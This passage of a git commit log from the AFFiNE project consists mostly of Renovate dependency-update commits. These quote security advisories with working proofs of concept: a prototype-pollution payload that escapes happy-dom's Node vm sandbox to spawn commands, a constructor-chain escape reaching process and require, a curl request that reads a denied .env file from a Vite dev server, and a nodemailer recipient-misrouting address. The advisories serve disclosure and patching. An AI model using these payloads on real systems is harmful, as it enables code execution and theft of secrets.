[v9.46.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.46.0) - fix: Ensure native directory ends up in package ([#​1216](https://redirect.github.com/getsentry/sentry-electron/issues/1216)) ### [`v6.10.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#6100) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.9.0...6.10.0) - feat: Update JavaScript SDKs from [v9.43.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.43.0) to [v9.45.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.45.0) - fix: Don't use `deepmerge` to merge events to remove circular ref. issues ([#​1210](https://redirect.github.com/getsentry/sentry-electron/issues/1210)) - fix: Support `node16` for TypeScript `moduleResolution` ([#​1203](https://redirect.github.com/getsentry/sentry-electron/issues/1203)) ### [`v6.9.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#690) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.8.0...6.9.0) - feat: Update JavaScript SDKs from [v9.26.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.26.0) to [v9.43.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.43.0) - feat: Add `eventLoopBlockIntegration` ([#​1188](https://redirect.github.com/getsentry/sentry-electron/issues/1188)) - feat: Move renderer event loop block detection to an integration ([#​1196](https://redirect.github.com/getsentry/sentry-electron/issues/1196)) ### [`v6.8.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#680) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.7.0...6.8.0) - feat: Update JavaScript SDKs from [v9.25.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.25.0) to [v9.26.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.26.0) - fix: Don't capture stack traces from destroyed renderers ([#​1165](https://redirect.github.com/getsentry/sentry-electron/issues/1165)) ### [`v6.7.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#670) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.6.0...6.7.0) - feat: Update JavaScript SDKs from [v9.18.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.18.0) to [v9.25.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.25.0) - feat: Add structured logging support ([#​1159](https://redirect.github.com/getsentry/sentry-electron/issues/1159)) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xMzAuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE0My4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
renovate[bot]
|
a47042cbd5 |
chore: bump up happy-dom version to v20.0.2 [SECURITY] (#13765)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [happy-dom](https://redirect.github.com/capricorn86/happy-dom) | [`20.0.0` -> `20.0.2`](https://renovatebot.com/diffs/npm/happy-dom/20.0.0/20.0.2) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-62410](https://redirect.github.com/capricorn86/happy-dom/security/advisories/GHSA-qpm2-6cq5-7pq5) ### Summary The mitigation proposed in GHSA-37j7-fg3j-429f for disabling eval/Function when executing untrusted code in happy-dom does not suffice, since it still allows prototype pollution payloads. ### Details The untrusted script and the rest of the application still run in the same Isolate/process, so attackers can deploy prototype pollution payloads to hijack important references like "process" in the example below, or to hijack control flow via flipping checks of undefined property. There might be other payloads that allow the manipulation of require, e.g., via (univeral) gadgets (https://www.usenix.org/system/files/usenixsecurity23-shcherbakov.pdf). ### PoC Attackers can pollute builtins like Object.prototype.hasOwnProperty() to obtain important references at runtime, e.g., "process". In this way, attackers might be able to execute arbitrary commands like in the example below via spawn(). ```js import { Browser } from "happy-dom"; const browser = new Browser({settings: {enableJavaScriptEvaluation: true}}); const page = browser.newPage({console: true}); page.url = 'https://example.com'; let payload = 'spawn_sync = process.binding(`spawn_sync`);normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(` `);typeof a.shell===`string`?c=a.shell:c=`/bin/sh`,b=[`-c`,g];}typeof a.argv0===`string`?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+`=`+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:`pipe`,readable:!0,writable:!1},{type:`pipe`,readable:!1,writable:!0},{type:`pipe`,readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!==`buffer`)for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + `spawnSync `+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};' page.content = `<html> <script> function f() { let process = this; ${payload}; spawnSync("touch", ["success.flag"]); return "success";} this.constructor.constructor.__proto__.__proto__.toString = f; this.constructor.constructor.__proto__.__proto__.hasOwnProperty = f; // Other methods that can be abused this way: isPrototypeOf, propertyIsEnumerable, valueOf </script> <body>Hello world!</body></html>`; await browser.close(); console.log(`The process object is ${process}`); console.log(process.hasOwnProperty('spawn')); ``` ### Impact Arbitrary code execution via breaking out of the Node.js' vm isolation. ### Recommended Immediate Actions Users can freeze the builtins in the global scope to defend against attacks similar to the PoC above. However, the untrusted code might still be able to retrieve all kind of information available in the global scope and exfiltrate them via fetch(), even without prototype pollution capabilities. Not to mention side channels caused by the shared process/isolate. Migration to [isolated-vm](https://redirect.github.com/laverdet/isolated-vm) is suggested instead. Cris from the Endor Labs Security Research Team, who has worked extensively on JavaScript sandboxing in the past, submitted this advisory. --- ### Release Notes <details> <summary>capricorn86/happy-dom (happy-dom)</summary> ### [`v20.0.2`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.2) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.1...v20.0.2) ##### :construction\_worker\_man: Patch fixes - Adds frozen intrinsics flag to workers in `@happy-dom/server-renderer` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1934](https://redirect.github.com/capricorn86/happy-dom/issues/1934) ### [`v20.0.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.1) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.0...v20.0.1) ##### :construction\_worker\_man: Patch fixes - Adds warning for environment with unfrozen intrinsics (builtins) when JavaScript evaluation is enabled- By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1932](https://redirect.github.com/capricorn86/happy-dom/issues/1932) - A security advisory has been reported showing that the recommended preventive measure of running Node.js with `--disallow-code-generation-from-strings` wasn't enough to protect against attackers escaping the VM context and accessing process-level functions. Big thanks to [@​cristianstaicu](https://redirect.github.com/cristianstaicu) for reporting this! - The documentation for how to run Happy DOM with JavaScript evaluation enabled in a safer way has been updated. Read more about it in the [Wiki](https://redirect.github.com/capricorn86/happy-dom/wiki/JavaScript-Evaluation-Warning) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNDMuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE1Ni4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
renovate[bot]
|
2c44d3abc6 |
chore: bump up vite version to v7 [SECURITY] (#13786)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [vite](https://vite.dev) ([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite)) | [`^6.1.0` -> `^7.0.0`](https://renovatebot.com/diffs/npm/vite/6.3.6/7.1.11) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [vite](https://vite.dev) ([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite)) | [`^6.0.3` -> `^7.0.0`](https://renovatebot.com/diffs/npm/vite/6.3.6/7.1.11) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-62522](https://redirect.github.com/vitejs/vite/security/advisories/GHSA-93m4-6634-74q7) ### Summary Files denied by [`server.fs.deny`](https://vitejs.dev/config/server-options.html#server-fs-deny) were sent if the URL ended with `\` when the dev server is running on Windows. ### Impact Only apps that match the following conditions are affected: - explicitly exposes the Vite dev server to the network (using --host or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) - running the dev server on Windows ### Details `server.fs.deny` can contain patterns matching against files (by default it includes `.env`, `.env.*`, `*.{crt,pem}` as such patterns). These patterns were able to bypass by using a back slash(`\`). The root cause is that `fs.readFile('/foo.png/')` loads `/foo.png`. ### PoC ```shell npm create vite@latest cd vite-project/ cat "secret" > .env npm install npm run dev curl --request-target /.env\ http://localhost:5173 ``` <img width="1593" height="616" alt="image" src="https://github.com/user-attachments/assets/36212f4e-1d3c-4686-b16f-16b35ca9e175" /> --- ### Release Notes <details> <summary>vitejs/vite (vite)</summary> ### [`v7.1.11`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-7111-2025-10-20-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.1.10...v7.1.11) ##### Bug Fixes - **dev:** trim trailing slash before `server.fs.deny` check ([#​20968](https://redirect.github.com/vitejs/vite/issues/20968)) ([f479cc5]( |
||
|
renovate[bot]
|
50f41c2212 |
chore: bump up happy-dom version to v20 [SECURITY] (#13726)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [happy-dom](https://redirect.github.com/capricorn86/happy-dom) | [`^18.0.0` -> `^20.0.0`](https://renovatebot.com/diffs/npm/happy-dom/18.0.1/20.0.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-61927](https://redirect.github.com/capricorn86/happy-dom/security/advisories/GHSA-37j7-fg3j-429f) # Escape of VM Context gives access to process level functionality ## Summary Happy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE (Remote Code Execution) attacks. A Node.js VM Context is not an isolated environment, and if the user runs untrusted JavaScript code within the Happy DOM VM Context, it may escape the VM and get access to process level functionality. What the attacker can get control over depends on if the process is using ESM or CommonJS. With CommonJS the attacker can get hold of the `require()` function to import modules. Happy DOM has JavaScript evaluation enabled by default. This may not be obvious to the consumer of Happy DOM and can potentially put the user at risk if untrusted code is executed within the environment. ## Reproduce ### CommonJS (Possible to get hold of require) ```javascript const { Window } = require('happy-dom'); const window = new Window({ console }); window.document.write(` <script> const process = this.constructor.constructor('return process')(); const require = process.mainModule.require; console.log('Files:', require('fs').readdirSync('.').slice(0,3)); </script> `); ``` ### ESM (Not possible to get hold of import or require) ```javascript const { Window } = require('happy-dom'); const window = new Window({ console }); window.document.write(` <script> const process = this.constructor.constructor('return process')(); console.log('PID:', process.pid); </script> `); ``` ## Potential Impact #### Server-Side Rendering (SSR) ```javascript const { Window } = require('happy-dom'); const window = new Window(); window.document.innerHTML = userControlledHTML; ``` #### Testing Frameworks Any test suite using Happy-DOM with untrusted content may be at risk. ## Attack Scenarios 1. **Data Exfiltration**: Access to environment variables, configuration files, secrets 2. **Lateral Movement**: Network access for connecting to internal systems. Happy DOM already gives access to the network by fetch, but has protections in place (such as CORS and header validation etc.). 3. **Code Execution**: Child process access for running arbitrary commands 4. **Persistence**: File system access ## Recommended Immediate Actions 1. Update Happy DOM to v20 or above - This version has JavaScript evaluation disabled by default - This version will output a warning if JavaScript is enabled in an insecure environment 2. Run Node.js with the "--disallow-code-generation-from-strings" if you need JavaScript evaluation enabled - This makes sure that evaluation can't be used at process level to escape the VM - `eval()` and `Function()` can still be used within the Happy DOM VM without any known security risk - Happy DOM v20 and above will output a warning if this flag is not in use 4. If you can't update Happy DOM right now, it's recommended to disable JavaScript evaluation, unless you completely trust the content within the environment ## Technical Root Cause All classes and functions inherit from [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function). By walking the constructor chain it's possible to get hold of [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function) at process level. As [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function) can evaluate code from strings, it's possible to execute code at process level. Running Node with the "--disallow-code-generation-from-strings" flag protects against this. --- ### Release Notes <details> <summary>capricorn86/happy-dom (happy-dom)</summary> ### [`v20.0.0`](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.2...819d15ba289495439eda8be360d92a614ce22405) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.2...v20.0.0) ### [`v19.0.2`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.2) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.1...v19.0.2) ##### :construction\_worker\_man: Patch fixes - Fixes issue related to CSS pseudo selector `:scope` that didn't work correctly for direct descendants to root - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1620](https://redirect.github.com/capricorn86/happy-dom/issues/1620) ### [`v19.0.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.1) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.0...v19.0.1) ##### :construction\_worker\_man: Patch fixes - Fixes issue with sending in URLs as string in `@happy-dom/server-renderer` config using CLI - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1908](https://redirect.github.com/capricorn86/happy-dom/issues/1908) ### [`v19.0.0`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.0) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v18.0.1...v19.0.0) ##### 💣 Breaking Changes - Removes support for CommonJS - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Support for CommonJS is no longer needed as Node.js v18 is deprecated and v20 and above supports loading ES modules from CommonJS using `require()` - Updates Jest to v30 in the `@happy-dom/jest-environment` package - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Makes Jest packages peer dependencies to make it easier to align versions with the project using `@happy-dom/jest-environment` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) ##### 🎨 Features - Adds a new package called `@happy-dom/server-renderer` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - This package provides a simple way to statically render (SSG) or server-side render (SSR) your client-side application - Read more in the Wiki under [Server-Renderer](https://redirect.github.com/capricorn86/happy-dom/wiki/Server-Renderer) - Adds support for `import.meta` to the ESM compiler - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the CSS pseudo selector `:scope` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1620](https://redirect.github.com/capricorn86/happy-dom/issues/1620) - Improves support for `MediaList` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for `CSSKeywordValue`, `CSSStyleValue`, `StylePropertyMap`, `StylePropertyMap`, `StylePropertyMapReadOnly` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Improves debug information in the ESM compiler - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds validation of browser settings when creating a new `Browser` instance - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the browser setting [navigation.beforeContentCallback](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which makes it possible to inject event listeners or logic before content is loaded to the document when navigating a browser frame - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the browser setting [fetch.requestHeaders](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which provides with a declarative and simple way to add request headers - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for setting an object to [timer.preventTimerLoops](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which makes it possible to define different settings for `setTimeout()` and `requestAnimationFrame()` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the browser setting [viewport](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which makes it possible to define a default viewport size - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the parameters `beforeContentCallback` and `headers` to `BrowserFrame.goto()`, `BrowserFrame.goBack()`, `BrowserFrame.goForward()`, `BrowserFrame.goSteps()` and `BrowserFrame.reload()` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for `PopStateEvent` and trigger the event when navigating the page history using `History.pushState()` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Use local file paths for virtual server files in stack traces - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for `ResponseCache.fileSystem.load()` and `ResponseCache.fileSystem.save()` for storing and loading cache from the file system - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) ##### :construction\_worker\_man: Patch fixes - Fixes a bug in the ESM compiler that caused it to fail to parse certain code - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Disables the same origin policy when navigating a browser frame using `BrowserFrame.goto()` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Fixes bug where CSS selectors with the pseudos "+" and ">" failed for selectors without arguments - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds try and catch to listeners for events dispatched from `XMLHttpRequest` to prevent it from being set to an invalid state if a listener throws an Error - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNDMuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE0My4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
renovate[bot]
|
bf72833f05 |
chore: bump up nodemailer version to v7.0.7 [SECURITY] (#13704)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [nodemailer](https://nodemailer.com/) ([source](https://redirect.github.com/nodemailer/nodemailer)) | [`7.0.3` -> `7.0.7`](https://renovatebot.com/diffs/npm/nodemailer/7.0.3/7.0.7) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [GHSA-mm7p-fcc7-pg87](https://redirect.github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87) The email parsing library incorrectly handles quoted local-parts containing @​. This leads to misrouting of email recipients, where the parser extracts and routes to an unintended domain instead of the RFC-compliant target. Payload: `"xclow3n@gmail.com x"@​internal.domain` Using the following code to send mail ``` const nodemailer = require("nodemailer"); let transporter = nodemailer.createTransport({ service: "gmail", auth: { user: "", pass: "", }, }); let mailOptions = { from: '"Test Sender" <your_email@gmail.com>', to: "\"xclow3n@gmail.com x\"@​internal.domain", subject: "Hello from Nodemailer", text: "This is a test email sent using Gmail SMTP and Nodemailer!", }; transporter.sendMail(mailOptions, (error, info) => { if (error) { return console.log("Error: ", error); } console.log("Message sent: %s", info.messageId); }); (async () => { const parser = await import("@​sparser/email-address-parser"); const { EmailAddress, ParsingOptions } = parser.default; const parsed = EmailAddress.parse(mailOptions.to /*, new ParsingOptions(true) */); if (!parsed) { console.error("Invalid email address:", mailOptions.to); return; } console.log("Parsed email:", { address: `${parsed.localPart}@​${parsed.domain}`, local: parsed.localPart, domain: parsed.domain, }); })(); ``` Running the script and seeing how this mail is parsed according to RFC ``` Parsed email: { address: '"xclow3n@gmail.com x"@​internal.domain', local: '"xclow3n@gmail.com x"', domain: 'internal.domain' } ``` But the email is sent to `xclow3n@gmail.com` <img width="2128" height="439" alt="Image" src="https://github.com/user-attachments/assets/20eb459c-9803-45a2-b30e-5d1177d60a8d" /> ### Impact: - Misdelivery / Data leakage: Email is sent to psres.net instead of test.com. - Filter evasion: Logs and anti-spam systems may be bypassed by hiding recipients inside quoted local-parts. - Potential compliance issue: Violates RFC 5321/5322 parsing rules. - Domain based access control bypass in downstream applications using your library to send mails ### Recommendations - Fix parser to correctly treat quoted local-parts per RFC 5321/5322. - Add strict validation rejecting local-parts containing embedded @​ unless fully compliant with quoting. --- ### Release Notes <details> <summary>nodemailer/nodemailer (nodemailer)</summary> ### [`v7.0.7`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#707-2025-10-05) [Compare Source](https://redirect.github.com/nodemailer/nodemailer/compare/v7.0.6...v7.0.7) ##### Bug Fixes - **addressparser:** Fixed addressparser handling of quoted nested email addresses ([1150d99]( |
||
|
EYHN
|
4b3ebd899b |
feat(ios): update js subscription api (#13678)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit - New Features - Added on-demand subscription refresh and state retrieval in the iOS app, enabling up-to-date subscription status and billing information. - Exposed lightweight runtime APIs to check and update subscription state for improved account visibility. - Chores - Integrated shared GraphQL package and project references to support subscription operations. - Updated workspace configuration to include the common GraphQL module for the iOS app. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |